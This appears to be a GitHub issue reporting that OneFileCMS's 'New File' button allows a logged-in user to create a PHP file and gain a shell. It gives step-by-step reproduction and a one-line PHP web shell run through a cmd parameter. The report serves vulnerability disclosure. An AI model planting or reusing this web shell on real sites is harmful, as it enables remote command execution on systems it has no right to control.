The " New FIle " button cause getshell


http://fragrant:30001/OneFileCMS/onefilecms.php 
use username and password login the page
type New filename '123.php' click Create

![image](https://user-images.githubusercontent.com/22767054/42046202-ef448642-7b2f-11e8-9149-c45163246bb3.png)

123.php created successfully.
![image](https://user-images.githubusercontent.com/22767054/42046259-15e2b7a6-7b30-11e8-9843-443c64c1fc35.png)

click 123.php write below

```
<?php system($_GET['cmd']);?>
```

click save

![image](https://user-images.githubusercontent.com/22767054/42046381-594c1d02-7b30-11e8-9da7-eab499b1bab9.png)

123.php saved successfully.

fragrant:30001/OneFileCMS/123.php?cmd=whoami

![image](https://user-images.githubusercontent.com/22767054/42046435-7a252b68-7b30-11e8-87c0-c779973a5681.png)




Provide feedback

Saved searches

Use saved searches to filter your results more quickly

The " New FIle " button cause getshell #7

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

The " New FIle " button cause getshell #7

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions